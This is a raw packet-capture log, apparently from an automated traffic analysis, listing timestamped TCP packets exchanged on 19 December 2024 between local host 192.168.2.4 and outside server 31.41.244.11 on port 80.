                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.746669054 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.746721983 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.748507977 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.748575926 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.748621941 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.750382900 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.750442028 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.750483036 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.750560999 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.752294064 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.752357006 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.752408981 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.752449036 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.754220963 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.754266024 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.754328966 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.754523039 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.756125927 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.756203890 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.756302118 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.756386042 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.758081913 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.758177042 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.758219004 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.758251905 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.759975910 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.760026932 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.760077953 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.760118008 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.761897087 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.761979103 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.761989117 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.762173891 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.763860941 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.763926029 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.763955116 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.764178991 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.765717030 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.765795946 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.765827894 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.765866995 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.767647982 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.767700911 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.767745972 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.767955065 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.769543886 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.769591093 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.769680977 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.769721031 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.771470070 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.771595955 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.771631002 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.771650076 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.773468971 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.773523092 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.773571014 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.773749113 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.775300980 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.775357962 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.775402069 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.775448084 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.777286053 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.777472973 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.777488947 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.777510881 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.779139042 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.779192924 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.779263020 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.779304028 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.781141043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.781204939 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.781219006 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.781263113 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.782967091 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.783077002 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.783119917 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.784945965 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.785003901 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.785058975 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.785166025 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.786815882 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.786869049 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.786919117 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.786962986 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.788863897 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.788878918 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.788908958 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.788928032 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.790647030 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.790710926 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.790757895 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.790895939 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.792576075 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.792632103 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.792686939 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.793845892 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.794519901 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.794604063 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.794682026 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.796422958 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.796473026 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.796513081 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.796758890 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.798346043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.798396111 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.798448086 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.798579931 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.800246954 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.800288916 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.800342083 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.800384998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.802156925 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.802211046 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.802254915 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.802299976 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.804122925 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.804210901 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.804212093 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.804487944 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.806014061 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.806077003 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.806108952 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.806231976 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.807904005 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.807955027 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.808031082 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.808074951 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.809839010 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.809895992 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.809948921 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.810003042 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.811733961 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.811780930 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.811830044 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.812486887 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.813657045 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.813705921 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.813770056 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.813833952 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.815570116 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.815613031 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.815623045 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.815679073 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.817504883 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.817630053 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.817677021 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.819505930 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.819555998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.819561005 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.819605112 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.821381092 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.821433067 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.821446896 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.821502924 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917071104 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917144060 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917167902 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917215109 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917848110 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917893887 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917897940 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.917933941 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.919425964 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.919480085 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.919527054 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.919565916 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.920994043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.921027899 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.921083927 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.922580004 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.922708988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.922759056 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.924154043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.924207926 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.924238920 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.925676107 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.925729036 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.925776958 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.927232981 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.927258015 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.927335024 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.927388906 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.928752899 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.928828955 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.928875923 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.930181980 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.930232048 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.930280924 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.930325031 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.931720018 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.931773901 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.931822062 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.931865931 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.933140039 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.933185101 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.933224916 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.933279037 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.934607029 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.934647083 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.934705019 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.934743881 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.936028004 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.936072111 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.936166048 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.936208010 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.937442064 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.937517881 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.937553883 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.937602997 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.938914061 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.938930988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.938958883 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.938977957 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.940288067 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.940331936 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.940376997 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.940408945 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.941785097 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.941829920 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.941852093 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.941891909 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.943001032 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.943046093 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.943150043 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.943196058 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.944423914 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.944483995 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.944555044 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.944654942 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.945800066 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.945852041 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.945888996 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.945930958 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.947077990 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.947205067 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.947257996 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.948452950 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.948493958 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.948642969 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.948808908 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.949809074 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.949853897 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.949903011 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.949940920 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.951114893 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.951246977 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.951291084 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.952568054 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.952621937 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.952673912 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.952733040 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.953835011 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.953886032 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.953967094 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.954045057 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.955185890 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.955229998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.955327034 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.955368996 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.956536055 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.956590891 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.956628084 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.956774950 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.957906008 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.957963943 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.958028078 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.959255934 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.959309101 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.959320068 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.960598946 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.960648060 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.960726976 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.960772991 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.961982965 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.962069988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.962074041 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.962121964 CET4989280192.168.2.431.41.244.11
